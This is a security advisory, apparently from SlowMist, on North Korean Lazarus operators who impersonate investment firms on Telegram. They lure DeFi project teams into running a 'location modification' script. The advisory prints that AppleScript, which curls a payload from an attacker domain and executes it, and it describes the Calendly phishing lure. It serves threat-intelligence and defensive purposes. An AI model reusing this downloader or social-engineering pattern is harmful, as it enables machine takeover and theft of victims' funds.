North Korean hackers have begun impersonating well-known investment institutions to defraud project parties, with a significant impact.
Authored by: 23pds@SlowMist Security Team
Background
As early as 2022, the SlowMist Security Team discovered through the SlowMist BTI Intelligence Network that North Korean hackers from the Lazarus group had launched a large-scale Telegram fraud phishing operation targeting the cryptocurrency industry. Recently, North Korean hackers have even begun impersonating well-known investment institutions to defraud project parties. Given the significant impact, SlowMist is conducting an analysis here.
Tactics
- Select a well-known investment institution as the impersonation target, then create a fake Telegram account:
- Target well-known DeFi project parties, claiming to want to invest in them, and use a fake account to implement the scam:
North Korean hackers will initiate a chat with the target to establish contact. If the project party sees the message and lacks security awareness, the following scene may occur:
After gaining the trust of the project party, North Korean hackers will begin to schedule meetings. There are two attack methods here:
- Invite the project party to join a meeting on a platform like ***.group-meeting.team, pretending to inquire about the availability for a meeting or detailed discussion, and actively provide a malicious meeting link. When the project party clicks the link, they will encounter regional access restrictions. At this point, the North Korean hackers will then induce the project party to download and run their provided malicious script for "location modification." Once the project party does so, their computer will be controlled by the North Korean hackers, leading to fund theft. Below is the content of the malicious script IP_Request.scpt:
set fix_url to "https://support.group-meeting.online/778188/request-for-troubleshooting"
set sc to do shell script "curl -L -k""& fix_url &"\""
run script sc
Code Explanation:
- Utilize the "Add Custom Link" feature on the Calendly meeting scheduling system on the event page to insert a malicious link and launch a phishing attack. Because Calendly integrates well with the daily work background of most project parties, these malicious links are not easily suspected, and project parties may inadvertently click on the malicious link, download, and execute malicious code. At this point, North Korean hackers can also obtain relevant information or permissions from the project party's system.
The SlowMist Security Team also issued a warning about these attack methods on November 30, 2023:
Basic IOC:
IP: 104.168.137.21
Domains:
Malicious Attack Examples:
Conclusion
Given that such fraudulent activities are still ongoing, it is recommended that Web3 users ensure the authenticity of the other party through dual-channel confirmation when adding friends, and enable two-factor authentication (2FA) on Telegram at all times to ensure transaction security and prevent financial losses.
If a related trojan is inadvertently run, transfer the relevant funds as soon as possible, disconnect from the network, run antivirus software, and change relevant account passwords on the target computer (including those stored in the browser) and other information.
免责声明:本文章仅代表作者个人观点,不代表本平台的立场和观点。本文章仅供信息分享,不构成对任何人的任何投资建议。用户与作者之间的任何争议,与本平台无关。如网页中刊载的文章或图片涉及侵权,请提供相关的权利证明和身份证明发送邮件到support@aicoin.com,本平台相关工作人员将会进行核查。
